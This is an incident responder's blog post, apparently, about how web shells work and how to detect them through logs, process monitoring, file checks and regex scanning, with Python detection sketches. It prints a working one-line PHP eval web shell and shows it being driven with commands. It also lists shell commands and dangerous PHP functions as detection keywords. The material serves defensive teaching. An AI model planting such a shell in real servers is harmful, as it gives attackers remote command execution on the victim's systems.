
Analyzing and detecting web shells

Of the various pieces of malware I’ve analyzed, I still find web shells to be the most fascinating. While this is not a new topic, I've been asked by others to do a write-up on web shells, so here it is ;).

For those new to web shells, think of this type of malware as code designed to be executed by the web server. Instead of writing a backdoor in C, for example, an attacker can write malicious PHP and upload the code directly to a vulnerable web server. Web shells span many different languages and server types. Let's take a look at some common servers and their web extensions:

| Operating System | Service | Binary Name | Extensions |
|---|---|---|---|
| Windows | IIS (Internet Information Services) | w3wp.exe | .asp/.aspx |
| Windows/Linux | apache/apache2/nginx | httpd/httpd.exe/nginx | .php |
| Windows/Linux | Apache Tomcat* | tomcat*.exe/tomcat* | .jsp/.jspx |

Web shells 101

To better understand web shells, let’s take a look at a simple eval web shell below:

<?php ${${eval($_POST[potato])}};?>

This is a very simple yet dangerous eval web shell that I still see in use to this day in targeted engagements (on IIS, it shows up as the equivalent .asp or .aspx eval web shell). This PHP web shell will take any arbitrary PHP code assigned to the POST variable potato and evaluate it. Let's see how this would work in the real world. Let’s say an attacker has found a way to create the PHP file a.php inside your web directory.
Viewing the a.php web shell inside of notepad++.

Once the PHP file is created, we can begin issuing commands to the web shell. Let's see what happens when we issue a simple ipconfig. To issue this POST request, we’ll be using a tool called Postman.



Now that we have our form data added, the HTTP method set to POST and the full path of our PHP shell in the address bar, we click Send. The output should be as follows:
As you can see from the output above, our web shell was able to process the PHP code and run ipconfig. Not bad for 32 bytes…

In some cases, attackers may use web shells that accept parameters over a GET request. If this is the case, you should be able to review your web logs and pick out the requests that have suspicious parameters. Here's an example of the same web shell using a GET request rather than a POST request:
To make matters worse, if you were to visit that web page using any web browser and view its source code, all you would see is below:

This is because the PHP code is server side, not client side. For the sake of this exercise, we used Postman to issue commands to this eval web shell. While this approach does work, some attackers use a more graphical interface. The following screenshots show the Caidao frontend set up to use our eval shell, a.php. This shows how a simple eval web shell can be used to drive a full GUI application.






Another great write-up on eval web shell usage can be found at the following link:
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html  

Detecting the eval web shell
One method of detection is to review web logs for suspicious GET requests. In the previous example, we made a GET request to our web shell, attempting to execute our ipconfig command.

::1 - - [22/Aug/2018:12:42:00 -0400] "GET /dashboard/images/a.php?potato=ipconfig HTTP/1.1" 200 553 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" 

We can clearly see in the Apache access.log the ipconfig command being passed as a parameter to the a.php web shell. However, if we inspect one of the POST requests, we won’t see any of the parameters:

192.168.89.1 - - [22/Aug/2018:13:03:10 -0400] "POST /dashboard/images/a.php HTTP/1.1" 200 847 "-" "PostmanRuntime/7.2.0"

The reason we don’t see the potato parameter is that it's being passed in the body of the HTTP request, which the access.log doesn’t capture. So what else can we do to find this web shell? Let’s go down the list of some basic web shell detection methods:


Parameter detection
As we alluded to in the previous example, web shells can sometimes be found based on the GET parameters being passed to them. Depending on the host OS of your web server, you can look for suspicious commands inside your web logs. For Windows, we may look for cmd.exe, ipconfig or whoami, while on Linux we could search for bash, ifconfig or uname. While this is a long shot, I’ve had some luck finding shells this way. Most of the time, though, I just find web scanners hitting every page or looking for known shells by issuing TONS of requests to the web server. Nikto, for example, is usually very noisy and floods the access.log with these requests, which makes parameter detection not very effective on its own.
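As a rough illustration of parameter detection, here is a minimal Python sketch that walks access.log lines in the Apache combined format shown earlier and reports GET parameters whose values contain one of the command names listed above. The regular expressions and the function name suspicious_get_requests are my own assumptions for this example, not part of any existing tool, and the keyword list would need tuning for a real server.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed layout: Apache common/combined log format, as in the samples above.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Command names taken from the paragraph above; extend as needed.
SUSPICIOUS = re.compile(
    r'\b(cmd\.exe|ipconfig|whoami|bash|ifconfig|uname)\b', re.IGNORECASE
)


def suspicious_get_requests(lines):
    """Return (ip, path, parameter, value) for GET parameters that look like commands."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        parts = urlsplit(m.group("url"))
        # parse_qsl also decodes percent-encoded values before we search them.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if SUSPICIOUS.search(value):
                hits.append((m.group("ip"), parts.path, name, value))
    return hits
```

Run against the two log lines from the previous section, only the GET request is reported. The POST request slips through, which is exactly the limitation described above.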

Frequency analysis
With most production web servers, you can typically see a trend in which files are accessed, along with any parameters, status codes and bytes transferred. When it comes to frequency analysis, you have many ways to mix and mold the data to find anomalies. In some cases, reviewing the number of requests made to a single resource can be effective. For larger server deployments, though, that “stack” might be very large and take a while to process.
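One simple way to "stack" the data is to count requests per resource and look at the least requested paths first, since a web shell is usually visited far less often than legitimate pages. The sketch below assumes the Apache combined log format from earlier; the name rare_resources and the max_hits threshold are illustrative choices, not a recommendation.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Assumed layout: Apache common/combined log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def rare_resources(lines, max_hits=2):
    """Return (path, count) pairs for paths requested at most max_hits times."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            # Ignore the query string so a.php?x=1 and a.php?x=2 stack together.
            counts[urlsplit(m.group("url")).path] += 1
    rare = [(path, n) for path, n in counts.items() if n <= max_hits]
    return sorted(rare, key=lambda item: (item[1], item[0]))
```

On a busy server the rare end of the stack will still contain plenty of benign one-off requests (typos, scanners, old bookmarks), so treat the output as a list of leads rather than verdicts.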

Data Transferred
If your web server logs bytes per request (if it doesn’t, enable it!), sorting by byte I/O can help identify anomalous data transfers that may indicate an attacker using a shell to upload additional malware to your web server or to download data from it. We frequently identify data exfiltration in GET requests wherein an attacker has staged data on the web server for easy downloading.
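Sorting by bytes can be sketched in a few lines of Python. This example assumes the Apache combined log format, where the number after the status code is the response size, so it only surfaces large downloads. Spotting large uploads would need request sizes in the log as well (on Apache, mod_logio's %I), which this sketch does not handle. The function name largest_responses is made up for illustration.

```python
import re

# Assumed layout: Apache common/combined log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def largest_responses(lines, top=10):
    """Return the top (size, ip, method, url) tuples, largest response first."""
    rows = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Apache logs "-" when no body was sent; treat that as zero bytes.
        size = 0 if m.group("size") == "-" else int(m.group("size"))
        rows.append((size, m.group("ip"), m.group("method"), m.group("url")))
    return sorted(rows, reverse=True)[:top]
```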

Source IP
Looking at only the source IP addresses accessing your web server and grouping them by pages accessed may yield some anomalies. Enriching the records with GeoIP data gives you an additional field to group on.
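A minimal sketch of the grouping idea: collect the set of source IPs per page and report pages that only a single address has ever requested. It assumes the Apache combined log format; single_source_pages is a hypothetical name, and GeoIP enrichment is left out because it needs an external database.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumed layout: Apache common/combined log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def single_source_pages(lines):
    """Map each page that was requested by exactly one source IP to that IP."""
    sources = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            sources[urlsplit(m.group("url")).path].add(m.group("ip"))
    return {
        path: next(iter(ips))
        for path, ips in sources.items()
        if len(ips) == 1
    }
```

A page that dozens of visitors hit is probably part of the site. A PHP file that only one address has ever touched deserves a closer look.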

File names and location
In some cases, attackers that create new web shells use file names that stand out from the rest of the site, such as c99.php or a.php. In other cases, they will put web shells in non-standard web directories (like we did for our eval web shell example, which lives in the images directory).
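The location check can be sketched as a directory walk that flags server-side script files sitting in folders that normally hold only static content. The extension list comes from the table at the top of this post; the STATIC_DIRS names are an assumption on my part and should be adjusted to match your site layout.

```python
import os

# Script extensions from the table at the top of the post.
SCRIPT_EXTS = {".php", ".asp", ".aspx", ".jsp", ".jspx"}
# Assumed names of directories that should only contain static content.
STATIC_DIRS = {"images", "img", "css", "js", "fonts", "uploads"}


def scripts_in_static_dirs(web_root):
    """Return script files found anywhere below a static-content directory."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(web_root):
        rel_parts = os.path.relpath(dirpath, web_root).split(os.sep)
        if not STATIC_DIRS.intersection(part.lower() for part in rel_parts):
            continue
        for name in filenames:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)
```

With the a.php example from earlier, scanning the web root would report the file under dashboard/images while ignoring the legitimate PHP pages elsewhere on the site.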

Default file mods
In many cases, attackers don’t create a new file for their web shell. Recently, we saw attackers append an eval web shell to the default iisstart.htm. This is a default html file for an IIS install. However, when attackers modify this default file, the modified timestamp will be updated. For older IIS deployments (months/years), a default file like iisstart.htm being modified a week ago seems suspicious.
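As a sketch of this check, the snippet below walks a web root and reports default files whose modified timestamp falls within a recent window. Only iisstart.htm comes from the example above; the other entries in DEFAULT_FILES, the 30 day window and the function name are assumptions for illustration. Keep in mind that timestamps can be altered by an attacker, so a clean result here proves nothing by itself.

```python
import os
import time

# iisstart.htm is from the example above; the other names are assumptions.
DEFAULT_FILES = {"iisstart.htm", "index.html", "index.php"}


def recently_modified_defaults(web_root, max_age_days=30, now=None):
    """Return (path, mtime) for default files modified within max_age_days."""
    now = time.time() if now is None else now
    cutoff = now - max_age_days * 86400
    hits = []
    for dirpath, _dirnames, filenames in os.walk(web_root):
        for name in filenames:
            if name.lower() not in DEFAULT_FILES:
                continue
            path = os.path.join(dirpath, name)
            mtime = os.path.getmtime(path)
            if mtime >= cutoff:
                hits.append((path, mtime))
    return hits
```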

Process behaviour
This is my personal favorite, as I still use it day to day. When an attacker uses a web shell to run other binaries on disk, the process they run will actually be a child of the web server process and run under the same user context as the server. Let’s take another look at our eval web shell example from above:
We can clearly see cmd.exe is invoked first, followed by ipconfig.exe. To better understand this detection, let's use Procmon.exe (Process Monitor) to monitor httpd.exe for Process Create events. I’ve included the filter below:
Now if we make another request to our web shell with the same POST request, we should see the following record appear in Process Monitor:


ProTip
A good way to detect most web shells is to look for web server processes like w3wp.exe and httpd.exe that have unusual child processes such as cmd.exe or /bin/bash. Depending on your website, you may have some false positives (especially on Linux), so I recommend tuning out normal bash commands.
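The parent/child rule can be expressed as a small filter over process records. This sketch assumes you already have process creation events (from an EDR export, Sysmon, Process Monitor and so on) converted into dictionaries with pid, ppid and name keys. That record shape, the function names and the exact name lists are assumptions for this example.

```python
# Web server binaries from the table at the top of the post.
WEB_SERVERS = {"w3wp.exe", "httpd.exe", "httpd", "apache2", "nginx"}
# cmd.exe and bash come from the text above; sh is an added assumption.
SHELLS = {"cmd.exe", "bash", "sh"}


def is_web_server(name):
    """Match the known binaries plus the tomcat* wildcard from the table."""
    name = name.lower()
    return name in WEB_SERVERS or name.startswith("tomcat")


def shells_spawned_by_web_servers(processes):
    """Return (parent_name, child_name, child_pid) for shells whose parent is a web server."""
    by_pid = {proc["pid"]: proc for proc in processes}
    hits = []
    for proc in processes:
        if proc["name"].lower() not in SHELLS:
            continue
        parent = by_pid.get(proc["ppid"])
        if parent is not None and is_web_server(parent["name"]):
            hits.append((parent["name"], proc["name"], proc["pid"]))
    return hits
```

In the ipconfig example, the httpd.exe to cmd.exe edge is the one that fires. A cmd.exe started by an interactive user under explorer.exe is left alone.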

Regex detection
While the process-based detection is effective at identifying web shells at the time of use, attackers have been known to implant a web shell on a server and only use it as a backup method of ingress. We’ve seen this before in incident response engagements where a customer successfully removed all of the attacker’s backdoors and reset the passwords used for VPN access, but neglected to check for web shells. The attacker, having lost access to their backdoors, fell back to a web shell they had created on a DMZ server. Thankfully, the customer had an EDR solution in place and was using the behaviour detection mentioned above.

Without real-time process monitoring in place, however, we can use regex to detect some common strings inside these web shells, such as eval or exec. One tool that I’ve used in the past on Linux web servers (with Python already installed) is the NeoPI scanner: https://github.com/Neohapsis/NeoPI. The drawback of this utility is that it's not something you can just drop on any OS and run, as it requires Python to be installed. Yes, we could use Py2Exe to generate a Windows executable from this Python script, but that swells the file size and isn’t as performant as writing the same thing in Go (https://golang.org/). During incident response, having a code base that cross-compiles, supports static compilation and runs natively on the system to utilize all system resources makes all the difference.

It’s for these reasons (among many others) that I chose to write my web shell detector in Go. While the code is far from perfect (as I’m still new to Go), it’s a good primer on regex scanning for web shells in a cross-platform environment with formatted output (JSON or pipe-separated) so it can be integrated into any pipeline. When I wrote this utility, I used the following web shell repository to baseline the regex included in the project (kudos to @OMGAPT for the regex):
https://github.com/tennc/webshell
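To make the regex idea concrete, here is a small sketch of the technique. It is written in Python purely for brevity and is not the scanner described above, and the pattern is a deliberately tiny stand-in rather than the regex used in that project. The function names and the list of PHP function names in SUSPICIOUS are my own assumptions.

```python
import os
import re

SCRIPT_EXTS = (".php", ".asp", ".aspx", ".jsp", ".jspx")
# Illustrative pattern only: a few function calls commonly seen in PHP web shells.
SUSPICIOUS = re.compile(
    rb"\b(eval|exec|system|passthru|shell_exec|base64_decode|gzinflate)\s*\(",
    re.IGNORECASE,
)


def scan_file(path):
    """Return the sorted, de-duplicated suspicious function names found in one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    return sorted({m.group(1).decode("ascii").lower() for m in SUSPICIOUS.finditer(data)})


def scan_tree(root):
    """Map each script file under root to its suspicious matches (files with none are omitted)."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCRIPT_EXTS):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                findings[path] = hits
    return findings
```

A pattern this broad will match plenty of legitimate code, since many frameworks call eval or base64_decode, which is why baselining the regex against a real corpus of shells and of clean code matters.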

Check out the project, linked under Tools in the Appendix, if you wanna take it for a test drive.

Fully featured web shells
While the eval web shell is my favorite for its pure simplicity and capability, many other web shells have a user interface and a handful of baked-in tools. Also, most of these shells have a basic level of authentication to deny others on the internet access to the shell. Let's take a quick look at a 404 WSO web shell. If we happen to visit this type of web shell with any browser, it looks like the standard 404 page a typical web server would send.

Let's type another random file name in the address bar and see what is returned:
Interesting... so this server is returning two different 404 pages? Let’s take a look at the page source code for 404.php. You can do this by right-clicking on the page and selecting View page source.




This action should open up a new tab with the HTML source code visible, as shown below: 


It appears this PHP page has an input field which accepts a password. Let’s take another look at the page, but this time let’s perform a Select All, like we’re going to copy the site text, or use the mouse cursor to highlight everything.


We can clearly see we have an input field. If I put some text in this field, it becomes more visible. 
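The same check can be automated: a genuine 404 page has no reason to contain form fields, so any input element in an error page is worth a look. The sketch below uses Python's standard html.parser module; the function and class names are made up for this example, and the sample markup in the usage note is invented rather than copied from the real WSO shell.

```python
from html.parser import HTMLParser


class InputFinder(HTMLParser):
    """Collect the attributes of every <input> tag in a page."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def form_inputs(html):
    """Return a list of attribute dictionaries, one per <input> element."""
    finder = InputFinder()
    finder.feed(html)
    finder.close()
    return finder.inputs
```

For a page body such as `<h1>Not Found</h1><form method=post><input type=password name=pass></form>`, form_inputs returns one entry with type password, while a plain error page returns an empty list.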
Since I already know the password for this web shell (404, how secure?!), I’ll type it in and submit by pressing enter.
File manager view of a 404 WSO web shell

Now that we've passed the authentication layer, we are presented with the web shell. I won’t go into each tab, but you can clearly see it comes pre-baked with a lot of tools such as SQL, bruteforce, file manager and Exec, to name a few. Having encountered many variants of these shells in the wild, the next question is always “How did the attacker get the web shell on the server in the first place?!”



Making life harder
Of course not every web shell is as simple as the eval web shell or 404 WSO web shell. In some cases, even if you get a copy of the shell, it may take some work to expose the original source code to understand its functionality. Many commodity web shells use some form of armor to make static review of the code difficult. Some techniques include:
  • Encrypted web shells (P.A.S web shell)
  • Layers upon layers of obfuscation including gzinflate, base64, chr, ord, concatenation. Trying to decode these web shells by hand is a tedious task.
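For the common case where a shell is wrapped in repeated gzinflate(base64_decode(...)) layers, the peeling can be automated instead of done by hand. This is a minimal sketch under that assumption only: it handles just that one pairing, and the name peel_layers is my own. PHP's gzinflate works on raw DEFLATE data, which is why zlib is called with a negative window size.

```python
import base64
import binascii
import zlib


def peel_layers(blob, max_layers=20):
    """Undo nested base64 + raw-DEFLATE wrapping; return (payload, layers_removed)."""
    layers = 0
    while layers < max_layers:
        try:
            # Equivalent of PHP's gzinflate(base64_decode($blob)).
            blob = zlib.decompress(
                base64.b64decode(blob, validate=True), -zlib.MAX_WBITS
            )
        except (binascii.Error, zlib.error):
            # Not valid base64 or not valid DEFLATE: assume we reached the payload.
            break
        layers += 1
    return blob, layers
```

In practice you would first extract the encoded string literal from the PHP file and pass it in as bytes. Shells that mix in chr, ord or string concatenation between layers need extra handling that this sketch does not attempt.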

Appendix:

Tools

Webshell-scan: https://github.com/tstillz/webshell-scan

Special Thanks

Mike Scutt @OMGAPT for the awesome web shell regex, feedback and mentoring.
